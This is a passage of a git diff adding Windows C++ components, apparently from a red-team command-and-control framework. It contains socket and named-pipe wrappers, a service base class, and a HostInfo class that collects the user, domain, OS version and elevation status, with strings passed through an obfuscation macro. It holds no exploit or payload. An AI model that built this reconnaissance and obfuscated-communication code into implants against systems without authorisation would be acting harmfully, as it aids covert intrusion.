+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Socket::~Socket() noexcept +{ + if (m_Socket != INVALID_SOCKET) + closesocket(m_Socket); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Socket::Socket(Socket&& other) noexcept +{ + m_Socket = other.m_Socket; + other.m_Socket = INVALID_SOCKET; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Socket& MWR::Socket::operator=(Socket&& other) noexcept +{ + m_Socket = other.m_Socket; + other.m_Socket = INVALID_SOCKET; + return *this; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Socket::operator bool() const noexcept +{ + return m_Socket != INVALID_SOCKET; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::Socket::Send(ByteVector const& data) +{ + // First send the 4-byte (network order) length of chunk. + uint32_t size = htonl(static_cast(data.size())); + if (SOCKET_ERROR == send(m_Socket, reinterpret_cast(&size), sizeof(size), 0)) + throw MWR::SocketsException(OBF("Error sending to Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + + // Write the chunk to socket. + if (SOCKET_ERROR == send(m_Socket, reinterpret_cast(data.data()), static_cast(data.size()), 0)) + throw MWR::SocketsException(OBF("Error sending to Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Socket::Receive() +{ + // First read the 4-byte (network order) length of chunk. + uint32_t chunkLength = 0; + int bytesRead; + if (bytesRead = recv(m_Socket, reinterpret_cast(&chunkLength), 4, 0); bytesRead == SOCKET_ERROR) + throw MWR::SocketsException(OBF("Error receiving from Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + + uint32_t length = ntohl(chunkLength); + if (!bytesRead or !length) + return {}; //< The connection has been gracefully closed. + + // Read in the result. + ByteVector buffer; + buffer.resize(length); + for (DWORD bytesReadTotal = 0; bytesReadTotal < length; bytesReadTotal += bytesRead) + switch (bytesRead = recv(m_Socket, reinterpret_cast(&buffer[bytesReadTotal]), length - bytesReadTotal, 0)) + { + case 0: + return {}; //< The connection has been gracefully closed. + + case SOCKET_ERROR: + throw MWR::SocketsException(OBF("Error receiving from Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + } + return buffer; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::Socket::Bind(const AddrInfo& addrinfo) +{ + // Setup the TCP listening socket + if (bind(m_Socket, addrinfo->ai_addr, static_cast(addrinfo->ai_addrlen))) + throw SocketsException(OBF("bind failed with error: ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::Socket::Connect(std::string_view addr, uint16_t port) +{ + // TODO IPv6 support + sockaddr_in tsClient; + tsClient.sin_family = AF_INET; + tsClient.sin_port = htons(port); + + switch (inet_pton(AF_INET, addr.data(), &tsClient.sin_addr.s_addr)) + { + case 0: + throw std::invalid_argument(OBF("Provided address in not a valid IPv4 dotted - decimal string")); + case -1: + throw MWR::SocketsException(OBF("Couldn't convert standard text IPv4 address into its numeric binary form. Error code : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + } + + // Attempt to connect. + if (INVALID_SOCKET == (m_Socket = socket(AF_INET, SOCK_STREAM, 0))) + throw MWR::SocketsException(OBF("Couldn't create socket. Error code : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + + if (SOCKET_ERROR == connect(m_Socket, reinterpret_cast(&tsClient), sizeof(tsClient))) + throw MWR::SocketsException(OBF("Could not connect to ") + std::string{ addr } +OBF(":") + std::to_string(port) + OBF(". Error code : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::Socket::Listen(int maxconn) +{ + if (listen(m_Socket, 1) == SOCKET_ERROR) + throw MWR::SocketsException(OBF("listen failed. Error code: ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Socket MWR::Socket::Accept() +{ + SOCKET clientSocket = accept(m_Socket, nullptr, nullptr); + if (clientSocket == INVALID_SOCKET) + throw MWR::SocketsException(OBF("accept failed. Error code : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + return clientSocket; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::Socket::HasReceivedData() +{ + pollfd xx{ m_Socket, POLLRDNORM, 0}; + auto ret = WSAPoll(&xx, /* one socket on list */ 1, /* return immediately*/ 0); + if (ret == SOCKET_ERROR) + { + auto errCode = WSAGetLastError(); + throw SocketsException(OBF("Failed to poll socket. Error code: ") + std::to_string(errCode) + OBF("."), errCode); + } + else if (ret) + { + auto revent = xx.revents; + if (revent & POLLRDNORM) + return true; + if (revent & POLLHUP) + throw SocketsException(OBF("Connection aborted"), 0); + if (revent & POLLERR) + throw SocketsException(OBF("Unknown error occurred"), 0); + } + return false; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ClientSocket::ClientSocket(std::string_view addr, uint16_t port) + : m_Socket{ AddrInfo{ addr, std::to_string(port).c_str() } } +{ + m_Socket.Connect(addr, port); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ServerSocket::ServerSocket(std::string_view addr, uint16_t port) + : m_Addrinfo(addr, port) + , m_ListeningSocket(m_Addrinfo) +{ + m_ListeningSocket.Bind(m_Addrinfo); + m_ListeningSocket.Listen(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ServerSocket::ServerSocket(uint16_t port) + : ServerSocket(OBF(""), port) +{ +} diff --git a/Src/Common/MWR/Sockets/Socket.h b/Src/Common/MWR/Sockets/Socket.h new file mode 100644 index 0000000..cefe1c6 --- /dev/null +++ b/Src/Common/MWR/Sockets/Socket.h @@ -0,0 +1,135 @@ +#pragma once + +#include "AddrInfo.h" +#include "Common/MWR/CppTools/ByteVector.h" + +namespace MWR +{ + /// Socket wrapper + /// @note user has to call WSAStartup; + struct Socket + { + /// Create an invalid socket + Socket() noexcept = default; + + /// Create a socket with addrinfo + /// @throws WinSocketsException + Socket(const AddrInfo& addrinfo); + + /// Close socket + ~Socket() noexcept; + + /// Disallow copying + Socket(const Socket&) = delete; + + /// Disallow copying + Socket& operator=(const Socket&) = delete; + + /// Allow move + Socket(Socket&& other) noexcept; + + /// Allow move + Socket& operator=(Socket&& other) noexcept; + + /// Check if socket is in valid state + /// @return false if underlying SOCKET is in INVALID_SOCKET state + operator bool() const noexcept; + + /// Send data through socket. Prefixes the data with its length (4 bytes, network order) + /// @param data to send + /// @throws SocketsException + void Send(ByteVector const& data); + + /// Receive data from socket. Data must be prefixed with its length (4 bytes, network order) + /// @returns ByteVector - received data. Empty if connection has been closed gracefully. + /// @throws SocketsException + ByteVector Receive(); + + /// bind wrapper + /// @param addrinfo to bind socket to + /// @throws SocketsException + void Bind(const AddrInfo& addrinfo); + + /// connect wrapper for TCP/IPv4 + /// @param addr - remote IPv4 address (TODO support for IPv6) + /// @param port - remote port + /// @throws SocketsException + void Connect(std::string_view addr, uint16_t port); + + /// listen wrapper + /// @param maxconn - maximum number of connections in queue to accept + /// @throws SocketsException + void Listen(int maxconn = 1); + + /// accept wrapper + /// @return Socket bound to accepted connection + /// @throws SocketsException + Socket Accept(); + + /// Has socket received data + /// @throws SocketsException + bool HasReceivedData(); + + private: + /// Wrap and take ownership of given socket + /// @param socket - socket to wrap + Socket(SOCKET socket) : m_Socket(socket) {} + + /// Underlying handle + SOCKET m_Socket = INVALID_SOCKET; + }; + + + /// Wrapper for TCP client socket + class ClientSocket + { + public: + /// Create a TCP client socket + /// @param addr remote address to connect to + /// @param port remote port + /// @throws WinSocketsException + ClientSocket(std::string_view addr, uint16_t port); + + /// Send data through socket. Prefixes the data with its length (4 bytes, network order) + /// @param data to send + /// @throws WinSocketsException + void Send(ByteVector const& data) { m_Socket.Send(data); } + + /// Receive data from socket. Data must be prefixed with its length (4 bytes, network order) + /// @returns ByteVector - received data. Empty if connection has been closed gracefully. + /// @throws WinSocketsException + ByteVector Receive() { return m_Socket.Receive(); } + + /// Has socket received data + /// @throws SocketsException + bool HasReceivedData() { return m_Socket.HasReceivedData(); } + + private: + Socket m_Socket; + }; + + + /// Wrapper for TCP server socket + struct ServerSocket + { + /// Create a TCP server socket bound to specific host IP + /// @param addr - listening IP address + /// @param port - listening port + /// @throws WinSocketsException + ServerSocket(std::string_view addr, uint16_t port); + + /// Create a TCP server socket on + /// @param port - listening port + /// @throws WinSocketsException + ServerSocket(uint16_t port); + + /// accept wrapper + /// @return Socket bound to accepted connection + /// @throws WinSocketsException + Socket Accept() { return m_ListeningSocket.Accept(); } + + private: + AddrInfo m_Addrinfo; + Socket m_ListeningSocket; + }; +} diff --git a/Src/Common/MWR/Sockets/Sockets.hpp b/Src/Common/MWR/Sockets/Sockets.hpp new file mode 100644 index 0000000..82131fa --- /dev/null +++ b/Src/Common/MWR/Sockets/Sockets.hpp @@ -0,0 +1,8 @@ +#pragma once + +#include "PrecompiledHeader.hpp" + +#include "Socket.h" +#include "SocketsException.h" +#include "InitializeSockets.h" +#include "DuplexConnection.h" diff --git a/Src/Common/MWR/Sockets/SocketsException.h b/Src/Common/MWR/Sockets/SocketsException.h new file mode 100644 index 0000000..b1438d3 --- /dev/null +++ b/Src/Common/MWR/Sockets/SocketsException.h @@ -0,0 +1,32 @@ +#pragma once + +namespace MWR +{ + /// Exception used to indicate and describe WinSockets library errors. + struct SocketsException : std::runtime_error + { + /// Public ctor. + /// @param message description of error. + /// @param errorCode Sockets library error code (e.g. returned by WSAGetLastError()). + SocketsException(std::string const& message, int errorCode) + : std::runtime_error(message + OBF(" Error code: ") + std::to_string(errorCode)), m_ErrorCode(errorCode) + { } + + /// Error code value getter. + /// @return Sockets library error code value. + int GetErrorCode() const + { + return m_ErrorCode; + } + + /// Error code value setter. + /// @param new error code value to set. + void SetTimeOutValue(int const& errorCode) + { + m_ErrorCode = errorCode; + } + + private: + int m_ErrorCode; + }; +} diff --git a/Src/Common/MWR/WinTools/AbstractService.cpp b/Src/Common/MWR/WinTools/AbstractService.cpp new file mode 100644 index 0000000..8aa64b6 --- /dev/null +++ b/Src/Common/MWR/WinTools/AbstractService.cpp @@ -0,0 +1,53 @@ +#include "StdAfx.h" +#include "AbstractService.h" +#include "Services.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::CppCommons::CppTools::XError MWR::CppCommons::WinTools::AbstractService::OnServiceInit(DWORD, LPTSTR*) +{ + return NO_ERROR; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::CppCommons::CppTools::XError MWR::CppCommons::WinTools::AbstractService::OnServiceStop() +{ + SetServiceStatus(SERVICE_STOP_PENDING, 100); + + return NO_ERROR; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::AbstractService::OnServiceInterrogate() +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::AbstractService::OnServicePause() +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::AbstractService::OnServiceContinue() +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::AbstractService::OnServiceShutdown() +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::AbstractService::OnServiceUserControl(DWORD) +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::AbstractService::SetServiceStatus(DWORD state, DWORD waitHint, DWORD serviveExitCode) +{ + WinTools::Services::SetServiceStatus(state, waitHint, serviveExitCode); +} diff --git a/Src/Common/MWR/WinTools/AbstractService.h b/Src/Common/MWR/WinTools/AbstractService.h new file mode 100644 index 0000000..0666846 --- /dev/null +++ b/Src/Common/MWR/WinTools/AbstractService.h @@ -0,0 +1,55 @@ +#pragma once + +#include "Common/MWR/CppTools/XError.h" + +namespace MWR::CppCommons::WinTools +{ + struct Services; + + /// A structure that should be inherited from and instantiated in order to implement a Microsoft Windows Service. + struct AbstractService + { + /// Declared friendship with WinTools::Services struct, which acts as a manager for Services. + friend struct WinTools::Services; + + /// Callback function, that is called on initialization of the Service. + /// @param argc number of Service command-line arguments that are passed in argv array. + /// @param argv array of Service command-line arguments. + /// @return this callback should return S_OK to continue initialization of the Service. Any other value will be passed to STOP event as error to stop the Service gracefully. + /// @note DWORD has to be used instead of HRESULT, because this is the only form accepted by the SERVICE_STOPPED event. + virtual CppTools::XError OnServiceInit(DWORD argc, LPTSTR* argv); + + /// Callback function, that is called after initialization. This callback should perform the main task of the Service. When it returns, the Service is stopped. + /// @note DWORD has to be used instead of HRESULT, because this is the only form accepted by the SERVICE_STOPPED event. + virtual CppTools::XError OnServiceRun() = 0; + + /// Callback function, that is called on stop signal. If the Service requires more time to clean up, it should send STOP_PENDING status messages, along with a wait hint. + /// @note If a service calls SetServiceStatus with status set to SERVICE_STOPPED and exitCode set to a nonzero value, the following entry is written into the System event log: + /// Event ID = 7023, Source = Service Control Manager, Type = Error, Description = terminated with the following error : . + /// @return Filled SystemErrorCode object. + virtual CppTools::XError OnServiceStop(); + + /// Callback that notifies a Service that it should report its current status information to the service control manager. + virtual void OnServiceInterrogate(); + + /// Callback function, that is called on pause signal. + virtual void OnServicePause(); + + /// Callback function, that is called on continue signal. + virtual void OnServiceContinue(); + + /// Callback function, that is called on shutdown signal. + virtual void OnServiceShutdown(); + + /// Callback function, that is called on signals of value greater than 128. + /// @param opcode user defined code. + virtual void OnServiceUserControl(DWORD opcode); + + protected: + /// Sets Service state. @see SetServiceStatus MSDN documentation. + /// @param state new state to set. + /// @param waitHint the estimated time required for a pending start, stop, pause, or continue operation, in milliseconds. + /// @param serviveExitCode a service-specific error code that the service returns when an error occurs while the service is starting or stopping. + void SetServiceStatus(DWORD state, DWORD waitHint = 0, DWORD serviveExitCode = NO_ERROR); + }; +} diff --git a/Src/Common/MWR/WinTools/HostInfo.cpp b/Src/Common/MWR/WinTools/HostInfo.cpp new file mode 100644 index 0000000..a2f34c0 --- /dev/null +++ b/Src/Common/MWR/WinTools/HostInfo.cpp @@ -0,0 +1,167 @@ +#include "StdAfx.h" +#include "HostInfo.h" +#include "Common/MWR/CppTools/ScopeGuard.h" +#include "Shlobj.h" +#include "Lm.h" +#include + +namespace MWR +{ + namespace + { + std::string WidestringToString(std::wstring const& wstr) + { + if (wstr.empty()) + return {}; + + int size = WideCharToMultiByte(CP_UTF8, WC_ERR_INVALID_CHARS, &wstr[0], static_cast(wstr.size()), NULL, 0, NULL, NULL); + std::string ret(size, 0); + WideCharToMultiByte(CP_UTF8, WC_ERR_INVALID_CHARS, &wstr[0], static_cast(wstr.size()), &ret[0], size, NULL, NULL); + return ret; + } + + bool IsElevated() noexcept + { + HANDLE hToken = nullptr; + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) + return false; + + SCOPE_GUARD{ CloseHandle(hToken); }; + TOKEN_ELEVATION Elevation; + DWORD cbSize = sizeof(TOKEN_ELEVATION); + if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) + return false; + + return Elevation.TokenIsElevated; + } + } + + ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + HostInfo::HostInfo() : m_OsVersionInfo{ sizeof m_OsVersionInfo } + { + // Reserve buffers for winapi calls. + DWORD computerNameBufferLength = MAX_COMPUTERNAME_LENGTH + 1, userNameBufferLength = UNLEN + 1; + m_ComputerName.resize(computerNameBufferLength); + m_UserName.resize(userNameBufferLength); + + // Get name of the computer. + if (::GetComputerNameA(m_ComputerName.data(), &computerNameBufferLength)) + m_ComputerName.resize(computerNameBufferLength); + else + m_ComputerName.resize(0); + + // Get the user name. + if (::GetUserNameA(m_UserName.data(), &userNameBufferLength)) + m_UserName.resize(userNameBufferLength - 1); + else + m_UserName.resize(0); + +#pragma warning( push ) +#pragma warning(disable : 4996) // disable deprecation warning + // Retrieve Operating system version. + ::GetVersionExA(reinterpret_cast(&m_OsVersionInfo)); +#pragma warning( pop ) + + m_ProcessId = ::GetCurrentProcessId(); + + m_IsElevated = IsElevated(); + + LPWSTR buf = nullptr; + if (NETSETUP_JOIN_STATUS status; NERR_Success == ::NetGetJoinInformation(nullptr, &buf, &status)) + { + SCOPE_GUARD{ ::NetApiBufferFree(buf); }; + if(status == NetSetupDomainName) + m_Domain = WidestringToString(buf); + } + } + + HostInfo::HostInfo(ByteView bv) + : m_ComputerName(bv.Read()) + , m_UserName(bv.Read()) + , m_Domain(bv.Read()) + , m_OsVersionInfo + { [&] + { + decltype(m_OsVersionInfo) osv{sizeof osv}; + std::tie + ( + osv.dwMajorVersion, + osv.dwMinorVersion, + osv.dwBuildNumber, + osv.wServicePackMajor, + osv.wServicePackMinor, + osv.wProductType + ) = bv.Read(); + return osv; + }() + } + , m_ProcessId(bv.Read()) + , m_IsElevated(bv.Read()) + { + } + + HostInfo::HostInfo(const json& json) + { + json.at("ComputerName").get_to(m_ComputerName); + json.at("UserName").get_to(m_UserName); + json.at("Domain").get_to(m_Domain); + json.at("OsMajorVersion").get_to(m_OsVersionInfo.dwMajorVersion); + json.at("OsMinorVersion").get_to(m_OsVersionInfo.dwMinorVersion); + json.at("OsBuildNumber").get_to(m_OsVersionInfo.dwBuildNumber); + json.at("OsServicePackMajor").get_to(m_OsVersionInfo.wServicePackMajor); + json.at("OsServicePackMinor").get_to(m_OsVersionInfo.wServicePackMinor); + json.at("OsProductType").get_to(m_OsVersionInfo.wProductType); + json.at("ProcessId").get_to(m_ProcessId); + json.at("IsElevated").get_to(m_IsElevated); + } + + ByteVector HostInfo::ToByteVector() const + { + return ByteVector{} + .Write + ( + m_ComputerName, + m_UserName, + m_Domain, + m_OsVersionInfo.dwMajorVersion, + m_OsVersionInfo.dwMinorVersion, + m_OsVersionInfo.dwBuildNumber, + m_OsVersionInfo.wServicePackMajor, + m_OsVersionInfo.wServicePackMinor, + m_OsVersionInfo.wProductType, + m_ProcessId, + m_IsElevated + ); + } + + std::ostream& operator<<(std::ostream& os, HostInfo const& hi) + { + return os << "Computer name:\t" << hi.m_ComputerName << '\n' + << "Domain: \t" << hi.m_Domain << '\n' + << "User name:\t" << hi.m_UserName << '\n' + << "Is Elevated:\t" << std::boolalpha << hi.m_IsElevated << '\n' + << "Os version:\t" << "Windows "s << hi.m_OsVersionInfo.dwMajorVersion << '.' << hi.m_OsVersionInfo.dwMinorVersion + << (VER_NT_WORKSTATION == hi.m_OsVersionInfo.wProductType ? " Workstation SP: " : " Server SP: ") + << hi.m_OsVersionInfo.wServicePackMajor << '.' << hi.m_OsVersionInfo.wServicePackMinor + << " Build " << hi.m_OsVersionInfo.dwBuildNumber << '\n' + << "Process Id:\t" << hi.m_ProcessId << '\n'; + } + + void to_json(json& j, const HostInfo& hi) + { + j = json + { + {"ComputerName", hi.m_ComputerName}, + {"UserName", hi.m_UserName}, + {"Domain", hi.m_Domain}, + {"ProcessId", hi.m_ProcessId}, + {"OsMajorVersion", hi.m_OsVersionInfo.dwMajorVersion}, + {"OsMinorVersion", hi.m_OsVersionInfo.dwMinorVersion}, + {"OsBuildNumber", hi.m_OsVersionInfo.dwBuildNumber}, + {"OsServicePackMajor", hi.m_OsVersionInfo.wServicePackMajor}, + {"OsServicePackMinor", hi.m_OsVersionInfo.wServicePackMinor}, + {"OsProductType", hi.m_OsVersionInfo.wProductType}, + {"IsElevated", hi.m_IsElevated}, + }; + } +} diff --git a/Src/Common/MWR/WinTools/HostInfo.h b/Src/Common/MWR/WinTools/HostInfo.h new file mode 100644 index 0000000..a5d0166 --- /dev/null +++ b/Src/Common/MWR/WinTools/HostInfo.h @@ -0,0 +1,45 @@ +#pragma once + +#include "Common/json/json.hpp" + + +namespace MWR +{ + using json = nlohmann::json; + + /// Holds informations about host + struct HostInfo + { + std::string m_ComputerName; ///< Host name. + std::string m_UserName; ///< Currently logged user name. + std::string m_Domain; ///< Domain name + OSVERSIONINFOEXA m_OsVersionInfo; ///< MS windows version info + DWORD m_ProcessId; ///< Process Id + bool m_IsElevated; ///< Is process run with elevated rights + + /// Gather host information + HostInfo(); + + /// Deserializing constructor from json + /// @param json to read from + HostInfo(const json& json); + + /// Deserializing constructor from ByteView + /// @param byte view n to read from + HostInfo(ByteView bv); + + /// Serialize to ByteVector + /// @returns ByteVector representation of host information + ByteVector ToByteVector() const; + }; + + /// Overload ostream operator << for HostInfo + /// @param ostream to write to + /// @param host info to write + std::ostream& operator <<(std::ostream& os, HostInfo const& hi); + + /// overload to_json for HostInfo + /// @param json to write to + /// @param host info to write + void to_json(json& j, const HostInfo& hi); +} diff --git a/Src/Common/MWR/WinTools/OsVersion.manifest b/Src/Common/MWR/WinTools/OsVersion.manifest new file mode 100644 index 0000000..c647205 --- /dev/null +++ b/Src/Common/MWR/WinTools/OsVersion.manifest @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Src/Common/MWR/WinTools/Pipe.cpp b/Src/Common/MWR/WinTools/Pipe.cpp new file mode 100644 index 0000000..b53f298 --- /dev/null +++ b/Src/Common/MWR/WinTools/Pipe.cpp @@ -0,0 +1,194 @@ +#include "Stdafx.h" +#include "Pipe.h" +#include "Common/MWR/CppTools/ScopeGuard.h" + +#include "sddl.h" +#pragma comment(lib, "advapi32.lib") + +namespace +{ + BOOL CreateDACL(SECURITY_ATTRIBUTES* pSA) + { + pSA->nLength = sizeof(SECURITY_ATTRIBUTES); + pSA->bInheritHandle = FALSE; + + TCHAR* szSD = TEXT("D:") // Discretionary ACL + TEXT("(D;OICI;GA;;;BG)") // Deny access to + // built-in guests + TEXT("(D;OICI;GA;;;AN)") // Deny access to + // anonymous logon + TEXT("(A;OICI;GRGW;;;AU)") // Allow + // read/write + // to authenticated + // users + TEXT("(A;OICI;GA;;;BA)"); // Allow full control + // to administrators + + if (NULL == pSA) + return FALSE; + + return ConvertStringSecurityDescriptorToSecurityDescriptor( + szSD, + SDDL_REVISION_1, + &(pSA->lpSecurityDescriptor), + NULL); + } + + BOOL FreeDACL(SECURITY_ATTRIBUTES* pSA) + { + return NULL == LocalFree(pSA->lpSecurityDescriptor); + } + + std::unique_ptr> g_SecurityAttributes = + { + []() {auto ptr = new SECURITY_ATTRIBUTES; CreateDACL(ptr); return ptr; }(), + [](SECURITY_ATTRIBUTES* ptr) {FreeDACL(ptr); delete ptr; } + }; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::WinTools::WritePipe::WritePipe(ByteView pipename) + : + m_PipeName(OBF(R"(\\.\pipe\)") + std::string{ pipename }), + m_Pipe([&]() +{ + auto handle = CreateNamedPipeA(m_PipeName.c_str(), PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, 512, 102400, 0, g_SecurityAttributes.get()); + if (!handle) + throw std::runtime_error{ OBF("Creating pipe failed:") + m_PipeName }; + + return handle; +}(), [](void* data) +{ + CloseHandle(data); +}) +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +size_t MWR::WinTools::WritePipe::Write(ByteView data) +{ + if (data.size() > std::numeric_limits::max()) + throw std::runtime_error{ OBF("Write error, too much data.") }; + + ConnectNamedPipe(m_Pipe.get(), nullptr); + SCOPE_GUARD{ DisconnectNamedPipe(m_Pipe.get()); }; + DWORD written; + uint32_t len = static_cast(data.size()); + WriteFile(m_Pipe.get(), &len, sizeof(len), nullptr, nullptr); + WriteFile(m_Pipe.get(), data.data(), len, &written, nullptr); + if (written != data.size()) + throw std::runtime_error{ OBF("Write pipe failed ") }; + + FlushFileBuffers(m_Pipe.get()); + + return data.size(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::WinTools::ReadPipe::ReadPipe(ByteView pipename) + : m_PipeName(OBF(R"(\\.\pipe\)") + std::string{ pipename }) +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::WinTools::ReadPipe::Read() +{ + HANDLE pipe = CreateFileA(m_PipeName.c_str(), GENERIC_READ | GENERIC_WRITE, 0, g_SecurityAttributes.get(), OPEN_EXISTING, 0, NULL); + if (pipe == INVALID_HANDLE_VALUE) + return {}; + + SCOPE_GUARD{ CloseHandle(pipe); }; + + DWORD chunkSize; + uint32_t pipeBufferSize = 512u; + uint32_t dataSize = 0u; + if (!ReadFile(pipe, static_cast(&dataSize), 4, nullptr, nullptr)) + throw std::runtime_error{ OBF("Unable to read data") }; + + ByteVector buffer; + buffer.resize(dataSize); + + DWORD read = 0; + while (read < dataSize) + { + if (!ReadFile(pipe, (LPVOID)&buffer[read], static_cast((pipeBufferSize < (dataSize - read)) ? pipeBufferSize : (dataSize - read)), &chunkSize, nullptr) || !chunkSize) + throw std::runtime_error{ OBF("Unable to read data") }; + + read += chunkSize; + } + + return buffer; +} +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::WinTools::DuplexPipe::DuplexPipe(ByteView inputPipeName, ByteView outputPipeName) + : m_InputPipe(inputPipeName), m_OutputPipe(outputPipeName) +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::WinTools::DuplexPipe::Read() +{ + return m_InputPipe.Read(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +size_t MWR::WinTools::DuplexPipe::Write(ByteView data) +{ + return m_OutputPipe.Write(data); +} +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::WinTools::AlternatingPipe::AlternatingPipe(ByteView pipename) + : m_PipeName(OBF("\\\\.\\pipe\\") + std::string{pipename}) + , m_Pipe([&]() {auto tmp = CreateFileA(m_PipeName.c_str(), GENERIC_READ | GENERIC_WRITE, 0, g_SecurityAttributes.get(), OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL); return tmp == INVALID_HANDLE_VALUE ? nullptr : tmp; }()) + , m_Event(CreateEvent(nullptr, false, true, nullptr)) +{ + if (!m_Pipe) + throw std::runtime_error{ OBF("Couldn't open named") }; + + if (!m_Event) + throw std::runtime_error{ OBF("Couldn't create synchronization event") }; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::WinTools::AlternatingPipe::Read() +{ + // Wait other side to read the pipe. + if (WaitForSingleObject(m_Event.get(), 0) != WAIT_OBJECT_0) + return{}; + + // Read four bytes and find the length of the next chunk of data. + DWORD chunkLength = 0, bytesReadCurrent = 0; + DWORD bytesAvailable = 0; + if (!ReadFile(m_Pipe.get(), &chunkLength, 4, &bytesReadCurrent, nullptr)) + throw std::runtime_error{ OBF("Couldn't read from Pipe: ") + std::to_string(GetLastError()) + OBF(".") }; + + // Read the next chunk of data up to the length specified in the previous four bytes. + ByteVector buffer; + buffer.resize(chunkLength); + for (DWORD bytesReadTotal = 0; bytesReadTotal < chunkLength; bytesReadTotal += bytesReadCurrent) + if (!ReadFile(m_Pipe.get(), &buffer[bytesReadTotal], chunkLength - bytesReadTotal, &bytesReadCurrent, nullptr)) + throw std::runtime_error{ OBF("Couldn't read from Pipe: ") + std::to_string(GetLastError()) + OBF(".") }; + + return buffer; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +size_t MWR::WinTools::AlternatingPipe::Write(ByteView data) +{ + // Write four bytes indicating the length of the next chunk of data. + DWORD chunkLength = static_cast(data.size()), bytesWritten = 0; + if (!WriteFile(m_Pipe.get(), &chunkLength, 4, &bytesWritten, nullptr)) + throw std::runtime_error{ OBF("Couldn't write to Pipe: ") + std::to_string(GetLastError()) + OBF(".") }; + + // Write the chunk. + if (!WriteFile(m_Pipe.get(), &data.front(), chunkLength, &bytesWritten, nullptr)) + throw std::runtime_error{ OBF("Couldn't write to Pipe: ") + std::to_string(GetLastError()) + OBF(".") }; + + // 